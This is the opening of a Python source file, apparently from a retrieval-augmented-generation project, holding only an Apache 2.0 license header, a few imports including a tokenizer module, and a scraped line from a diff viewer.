# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re,json,os
import pandas as pd
from rag.nlp import rag_tokenizer

Some files were not shown because too many files have changed in this diff Show More